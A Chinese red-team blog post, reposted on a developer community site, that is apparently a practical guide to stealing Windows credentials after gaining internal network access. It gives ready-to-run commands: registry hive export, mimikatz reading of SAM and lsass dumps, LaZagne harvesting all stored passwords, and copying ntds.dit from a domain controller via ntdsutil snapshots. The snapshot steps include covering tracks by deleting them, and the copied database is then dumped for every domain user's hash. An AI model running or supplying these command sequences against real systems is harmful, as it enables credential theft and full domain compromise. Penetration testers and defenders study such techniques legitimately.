学习
实践
活动
专区
工具
TVP
写文章
专栏首页漏洞知识库内网渗透之各种密码凭证窃取 - 渗透红队笔记

内网渗透之各种密码凭证窃取 - 渗透红队笔记

第一章:信息搜集

目标资产信息搜集的程度,决定渗透过程的复杂程度。

目标主机信息搜集的深度,决定后渗透权限持续把控。

渗透的本质是信息搜集,而信息搜集整理为后续的情报跟进提供了强大的保证。

----Micropoor

密码窃取

注册表读取密码


注册表读取密码主要获取的是两个文件:

reg save HKLM\SYSTEM Sys.hiv
reg save HKLM\SAM Sam.hiv

导出注册表之后,我们可以通过mimikatz读取密码hash值:

mimikatz读取密码
mimikatz.exe "lsadump::sam /sam:Sam.hiv /system:Sys.hiv " exit> hiv.txt

其中:NTLM加密的hash就是管理员登陆的加密密码!


lsass内存读取密码

lsass.exe是一个系统进程,用于微软Windows系统的安全机制。它用于本地安全和登陆策略zhi。

要想读取内存的密码,前提是用户登陆过机器,登陆过就会在内存中停留:lsass.exe

使用工具:procdump.exe

procdump.exe -accepteula -ma lsass.exe lsass.dmp

然后再通过mimikatz读取:

08或者08以下的机器读取的是明文密码:测试机器是Windows server 2008

mimikatz.exe "sekurlsa::minidump lsass.dmp" "log" "sekurlsa::logonpasswords"

LaZagne读取各类密码(浏览器等)

LaZagne是用于开源应用程序获取大量的密码存储在本地计算机上。每个软件都使用不同的技术(明文,API,自定义算法,数据库等)存储其密码。开发该工具的目的是为最常用的软件找到这些密码。

下载地址:

https://github.com/AlessandroZ/LaZagne

https://github.com/AlessandroZ/LaZagne/releases

获取所有密码:
lazagne.exe all

获取域内所有用户hash

前提是拿到域控!

windows的密码是经过hash后存储的,本地存在hklm\sam,hklm\system注册表中。

域里面存在域控制器的c:\windows\ntds\ntds.dit中

ntds.dit其实就是一个esent数据库,微软本身就有一系列的文档化api能够操作这个数据库。

相关连接:https://msdn.microsoft.com/en-us/library/windows/desktop/gg294074.aspx

一:创建快照

创建快照 ,必须在域控服务器上操作:

ntdsutil snapshot "activate instance ntds" create quit quit

其中:成功生成快照集 {5347834e-33bd-4c0a-a54e-13947650ae18} 这里面的ID要记住!

二:挂载快照

ntdsutil snapshot "mount {5347834e-33bd-4c0a-a54e-13947650ae18}" quit quit

三:复制快照到本地

copy C:\$SNAP_202010141916_VOLUMEC$\windows\NTDS\ntds.dit c:\ntds.dit

四:卸载快照(擦屁股)

ntdsutil snapshot "unmount {5347834e-33bd-4c0a-a54e-13947650ae18}" quit quit

五:删除快照

ntdsutil snapshot "delete {5347834e-33bd-4c0a-a54e-13947650ae18}" quit quit

六:获取key(用于解密)

通过注册表方式,吧key保存下来

reg save HKLM\SYSTEM c:\Sys.hiv

七:使用NTDSDumpEx获取所有域用户的hash

NTDSDumpEx.exe -d ntds.dit -o hash.txt -s Sys.hiv -h

hash.txt里面是所有域用户的账号和密码hash。


参考文章:

https://www.jianshu.com/p/e1990751bf84

https://github.com/AlessandroZ/LaZagnehttps://github.com/AlessandroZ/LaZagne/releases/

https://msdn.microsoft.com/en-us/library/windows/desktop/gg294074.aspx

文章分享自微信公众号:
渗透攻击红队

本文参与 腾讯云自媒体分享计划 ,欢迎热爱写作的你一起参与!

作者:渗透攻击红队
原始发表时间:2020-10-15
如有侵权,请联系 cloudcommunity@tencent.com 删除。
登录 后参与评论
0 条评论

相关文章

  • 内网渗透之命令行渗透 - 渗透红队笔记

    在内网渗透的时候,如果想要登录远程桌面,会容易暴露自己,所以尽可能学会使用命令行操作会在渗透实际过程中有很大的帮助。

    渗透攻击红队
  • 内网渗透之各种正反向内网穿透、端口转发(http,socks5)- 渗透红队笔记

    在我们拿下一个Webshell的时候,我们没办法把一些工具上传到目标服务器上去使用,那样可能会有风险,而且有的时候还没有特定的环境来使用工具。这个时候我们就可以...

    渗透攻击红队
  • 内网漏洞探测扫描 - 信息搜集篇 - 渗透红队笔记

    当我们拿到了一台网络边界的时候,我们发现内网里还有很多台设备,比如邮件服务器,数据库服务器等等,我们可以通过网络边界做跳板对内网进行深层次的漏洞扫描。

    渗透攻击红队
  • 内网信息搜集(Windows)- 信息搜集篇 - 渗透红队笔记

    LISTENING:表示监听中,这个端口正在开放,可以提供服务 CLOSING:表示关闭的,表示端口人为或者防火墙使其关闭(也许服务被卸载)

    渗透攻击红队
  • 企业安全 | 红蓝对抗

    声明:本人坚决反对利用文章内容进行恶意攻击行为,一切错误行为必将受到惩罚,绿色网络需要靠我们共同维护,推荐大家在了解技术原理的前提下,更好的维护个人信息安全、企...

    betasec
  • 以攻促防:企业蓝军建设思考

    2017年4月,黑客组织Shadow Brokers公布一批美国国家安全局(NSA)的网络漏洞军火库。背靠国家,NSA拥有强大的通杀型0day漏洞挖掘和利用能力...

    腾讯技术工程官方号
  • 浅谈个人对一个高性能红队建设的一些想法

    本人有幸参加了一些线下的攻防演练,比较熟悉攻防对抗的流程和手法,和很多师傅们在线下也有过深入学习交流,同时也产生了一些自己的想法。

    黑白天安全
  • 浅谈个人对一个高性能红队建设的一些想法

    本人有幸参加了一些线下的攻防演练,比较熟悉攻防对抗的流程和手法,和很多师傅们在线下也有过深入学习交流,同时也产生了一些自己的想法。

    陈殷
  • 域渗透不用进程窃取如何横向 Bypass Psexec AV 拿到域控?

    大家好,这里是 渗透攻击红队 的第 63 篇文章,本公众号会记录一些红队攻击的案例,不定时更新

    渗透攻击红队
  • ATT&CK实战系列——红队实战(一)

    因为要搭建一个内网环境,因此需要将虚拟机与外网隔绝,在VMware中可以通过虚拟机设置中的网络适配器来设置。

    红客突击队
  • 从外网代码审计到三层内网各种漏洞拿到域控

    大家好,这里是 渗透攻击红队 的第 58 篇文章,本公众号会记录一些红队攻击的案例,不定时更新

    渗透攻击红队
  • 一次小型 APT 持久潜伏内网域渗透(上)

    大家好,这里是 渗透攻击红队 的第 62 篇文章,本公众号会记录一些红队攻击的案例,不定时更新

    渗透攻击红队
  • 低权限下搜集当前机器各类密码文件

    大家好,这里是 渗透攻击红队 的第 75 篇文章,本公众号会记录一些红队攻击的案例,不定时更新!请勿利用文章内的相关技术从事非法测试,如因此产生的一切不良后果与...

    渗透攻击红队
  • 内网渗透中当 RDP 凭证没勾选保存,如何获取到明文凭证信息?

    大家好,这里是 渗透攻击红队 的第 61 篇文章,本公众号会记录一些红队攻击的案例,不定时更新

    渗透攻击红队
  • 从 Github 泄露到拨入 V*N 拿到域控

    大家好,这里是 渗透攻击红队 的第 60 篇文章,本公众号会记录一些红队攻击的案例,不定时更新

    渗透攻击红队
  • HW弹药库之红队作战手册

    上个月5月9号发了两个HW红方弹药库的,今天再来发一个红队作战人员手册,我大概看了看手册里面的exp零组文档包含了很多,

    天钧
  • 浅谈大规模红蓝对抗攻与防

    近年来各种大规模的红蓝对抗赛事方兴未艾,攻防实战受到了更多的重视。红队和蓝队的打法逐渐提升并趋于成熟,已不再是单方面的攻击与防御,而演变为攻防博弈和几乎不限手法...

    腾讯安全应急响应中心
  • 一条命令获取 IE 浏览器保存网站的账号和密码信息

    大家好,这里是 渗透攻击红队 的第 41 篇文章,本公众号会记录一些我学习红队攻击的复现笔记(由浅到深),不出意外每天一更

    渗透攻击红队
  • Windows 2008 GPP 组策略首选项漏洞利用

    大家好,这里是 渗透攻击红队 的第 76 篇文章,本公众号会记录一些红队攻击的案例,不定时更新!请勿利用文章内的相关技术从事非法测试,如因此产生的一切不良后果与...

    渗透攻击红队

扫码关注腾讯云开发者

领取腾讯云代金券